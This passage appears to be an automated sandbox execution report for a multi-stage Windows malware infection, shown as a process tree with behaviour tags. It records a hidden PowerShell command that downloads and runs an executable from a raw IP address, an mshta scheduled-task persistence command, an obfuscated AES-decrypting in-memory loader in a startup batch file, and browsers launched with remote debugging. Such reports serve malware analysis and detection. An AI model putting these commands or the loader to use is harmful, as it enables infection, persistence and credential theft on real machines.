                    • C:\Users\Admin\AppData\Local\Temp\1088328001\0ffe1f7c77.exe
                      "C:\Users\Admin\AppData\Local\Temp\1088328001\0ffe1f7c77.exe"
                      3⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      PID:3668
                    • C:\Users\Admin\AppData\Local\Temp\1088329001\e14272126a.exe
                      "C:\Users\Admin\AppData\Local\Temp\1088329001\e14272126a.exe"
                      3⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Downloads MZ/PE file
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Loads dropped DLL
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Checks processor information in registry
                      PID:1072
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                        4⤵
                        • Uses browser remote debugging
                        • Enumerates system info in registry
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of FindShellTrayWindow
                        PID:4864
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd196ccc40,0x7ffd196ccc4c,0x7ffd196ccc58
                          5⤵
                            PID:920
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1836,i,11113629415742175485,15090648988756058194,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1828 /prefetch:2
                            5⤵
                              PID:3768
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2124,i,11113629415742175485,15090648988756058194,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2196 /prefetch:3
                              5⤵
                                PID:1980
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2236,i,11113629415742175485,15090648988756058194,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2440 /prefetch:8
                                5⤵
                                  PID:2292
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,11113629415742175485,15090648988756058194,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3192 /prefetch:1
                                  5⤵
                                  • Uses browser remote debugging
                                  PID:5056
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3200,i,11113629415742175485,15090648988756058194,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3232 /prefetch:1
                                  5⤵
                                  • Uses browser remote debugging
                                  PID:1692
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4568,i,11113629415742175485,15090648988756058194,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4520 /prefetch:1
                                  5⤵
                                  • Uses browser remote debugging
                                  PID:2812
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4748,i,11113629415742175485,15090648988756058194,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4224 /prefetch:8
                                  5⤵
                                    PID:1908
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3636,i,11113629415742175485,15090648988756058194,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4844 /prefetch:8
                                    5⤵
                                      PID:60
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4964,i,11113629415742175485,15090648988756058194,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4876 /prefetch:8
                                      5⤵
                                        PID:5392
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5068,i,11113629415742175485,15090648988756058194,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5076 /prefetch:8
                                        5⤵
                                          PID:5500
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
                                        4⤵
                                        • Uses browser remote debugging
                                        • Enumerates system info in registry
                                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                        • Suspicious use of FindShellTrayWindow
                                        PID:6112
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd196d46f8,0x7ffd196d4708,0x7ffd196d4718
                                          5⤵
                                          • Checks processor information in registry
                                          • Enumerates system info in registry
                                          PID:6128
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,16597981381088551312,6809309705617281309,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
                                          5⤵
                                            PID:5164
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,16597981381088551312,6809309705617281309,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:3
                                            5⤵
                                              PID:4460
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,16597981381088551312,6809309705617281309,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2988 /prefetch:8
                                              5⤵
                                                PID:4232
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2092,16597981381088551312,6809309705617281309,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
                                                5⤵
                                                • Uses browser remote debugging
                                                PID:5444
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2092,16597981381088551312,6809309705617281309,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
                                                5⤵
                                                • Uses browser remote debugging
                                                PID:5504
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2092,16597981381088551312,6809309705617281309,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
                                                5⤵
                                                • Uses browser remote debugging
                                                PID:5680
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2092,16597981381088551312,6809309705617281309,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4992 /prefetch:1
                                                5⤵
                                                • Uses browser remote debugging
                                                PID:5692
                                          • C:\Users\Admin\AppData\Local\Temp\1088331001\e1c4702da7.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1088331001\e1c4702da7.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious use of FindShellTrayWindow
                                            • Suspicious use of SendNotifyMessage
                                            PID:5644
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c schtasks /create /tn 6QhiGmaZ3Bx /tr "mshta C:\Users\Admin\AppData\Local\Temp\HQFu7OFMI.hta" /sc minute /mo 25 /ru "Admin" /f
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:5708
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /create /tn 6QhiGmaZ3Bx /tr "mshta C:\Users\Admin\AppData\Local\Temp\HQFu7OFMI.hta" /sc minute /mo 25 /ru "Admin" /f
                                                5⤵
                                                • System Location Discovery: System Language Discovery
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:5868
                                            • C:\Windows\SysWOW64\mshta.exe
                                              mshta C:\Users\Admin\AppData\Local\Temp\HQFu7OFMI.hta
                                              4⤵
                                              • Checks computer location settings
                                              • System Location Discovery: System Language Discovery
                                              PID:5716
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RLOQOCQHVCI0USG5MEX4P5PJAZDL465A.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                                5⤵
                                                • Blocklisted process makes network request
                                                • Command and Scripting Interpreter: PowerShell
                                                • Downloads MZ/PE file
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5856
                                                • C:\Users\Admin\AppData\Local\TempRLOQOCQHVCI0USG5MEX4P5PJAZDL465A.EXE
                                                  "C:\Users\Admin\AppData\Local\TempRLOQOCQHVCI0USG5MEX4P5PJAZDL465A.EXE"
                                                  6⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Executes dropped EXE
                                                  • Identifies Wine through registry keys
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • System Location Discovery: System Language Discovery
                                                  PID:5468
                                          • C:\Users\Admin\AppData\Local\Temp\1088332001\d2YQIJa.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1088332001\d2YQIJa.exe"
                                            3⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • System Location Discovery: System Language Discovery
                                            PID:5664
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1088333041\tYliuwV.ps1"
                                            3⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Drops startup file
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:5148
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:5876
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "
                                                5⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:3224
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                5⤵
                                                • Blocklisted process makes network request
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:3448
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                  6⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5884
                                          • C:\Users\Admin\AppData\Local\Temp\1088334001\7aencsM.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1088334001\7aencsM.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            • System Location Discovery: System Language Discovery
                                            PID:3668
                                            • C:\Users\Admin\AppData\Local\Temp\1088334001\7aencsM.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1088334001\7aencsM.exe"
                                              4⤵
                                              • Executes dropped EXE
                                              PID:5736
                                            • C:\Users\Admin\AppData\Local\Temp\1088334001\7aencsM.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1088334001\7aencsM.exe"
                                              4⤵
                                              • Executes dropped EXE
                                              • Checks processor information in registry
                                              PID:6076
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                5⤵
                                                • Uses browser remote debugging
                                                • Enumerates system info in registry
                                                • Modifies data under HKEY_USERS
                                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                • Suspicious use of AdjustPrivilegeToken
                                                • Suspicious use of FindShellTrayWindow
                                                PID:5264
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd28a5cc40,0x7ffd28a5cc4c,0x7ffd28a5cc58
                                                  6⤵
                                                    PID:5276
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2056,i,2233476831590348623,5465262555987653613,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2052 /prefetch:2
                                                    6⤵
                                                      PID:4380
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1932,i,2233476831590348623,5465262555987653613,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2164 /prefetch:3
                                                      6⤵
                                                        PID:4812
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2300,i,2233476831590348623,5465262555987653613,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2480 /prefetch:8
                                                        6⤵
                                                          PID:5204
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3204,i,2233476831590348623,5465262555987653613,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3224 /prefetch:1
                                                          6⤵
                                                          • Uses browser remote debugging
                                                          PID:1376
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3232,i,2233476831590348623,5465262555987653613,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3272 /prefetch:1
                                                          6⤵
                                                          • Uses browser remote debugging
                                                          PID:5672
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4440,i,2233476831590348623,5465262555987653613,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4276 /prefetch:1
                                                          6⤵
                                                          • Uses browser remote debugging
                                                          PID:3196
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4620,i,2233476831590348623,5465262555987653613,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4684 /prefetch:8
                                                          6⤵
                                                            PID:5468
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4676,i,2233476831590348623,5465262555987653613,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4828 /prefetch:8
                                                            6⤵
                                                              PID:2944
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4700,i,2233476831590348623,5465262555987653613,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4716 /prefetch:8
                                                              6⤵
                                                                PID:5476
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4976,i,2233476831590348623,5465262555987653613,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4744 /prefetch:8
                                                                6⤵
                                                                  PID:516
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3668 -s 976
                                                              4⤵
                                                              • Program crash
                                                              PID:5656
                                                          • C:\Users\Admin\AppData\Local\Temp\1088335001\DTQCxXZ.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\1088335001\DTQCxXZ.exe"
                                                            3⤵
                                                            • Executes dropped EXE
                                                            PID:5364
                                                          • C:\Users\Admin\AppData\Local\Temp\1088336001\9aiiMOQ.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\1088336001\9aiiMOQ.exe"
                                                            3⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            • System Location Discovery: System Language Discovery
                                                            PID:6056
                                                            • C:\Users\Admin\AppData\Local\Temp\1088336001\9aiiMOQ.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\1088336001\9aiiMOQ.exe"
                                                              4⤵
                                                              • Executes dropped EXE
                                                              PID:3944
                                                            • C:\Users\Admin\AppData\Local\Temp\1088336001\9aiiMOQ.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\1088336001\9aiiMOQ.exe"
                                                              4⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3380
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 6056 -s 792
                                                              4⤵
                                                              • Program crash
                                                              PID:5880
                                                          • C:\Users\Admin\AppData\Local\Temp\1088338001\YMci4Rc.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\1088338001\YMci4Rc.exe"
                                                            3⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            • System Location Discovery: System Language Discovery
                                                            PID:6032
                                                            • C:\Users\Admin\AppData\Local\Temp\1088338001\YMci4Rc.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\1088338001\YMci4Rc.exe"
                                                              4⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:1592
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 804
                                                              4⤵
                                                              • Program crash
                                                              PID:1552
                                                          • C:\Users\Admin\AppData\Local\Temp\1088339001\NL58452.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\1088339001\NL58452.exe"
                                                            3⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            • System Location Discovery: System Language Discovery
                                                            PID:4980
                                                            • C:\Users\Admin\AppData\Local\Temp\1088339001\NL58452.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\1088339001\NL58452.exe"
                                                              4⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:5720
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 804
                                                              4⤵
                                                              • Program crash
                                                              PID:6068
                                                          • C:\Users\Admin\AppData\Local\Temp\1088340001\kdMujZh.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\1088340001\kdMujZh.exe"
                                                            3⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Drops file in Windows directory
                                                            • System Location Discovery: System Language Discovery
                                                            PID:5216
                                                          • C:\Users\Admin\AppData\Local\Temp\1088341001\oKUl4yo.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\1088341001\oKUl4yo.exe"
                                                            3⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            PID:4528
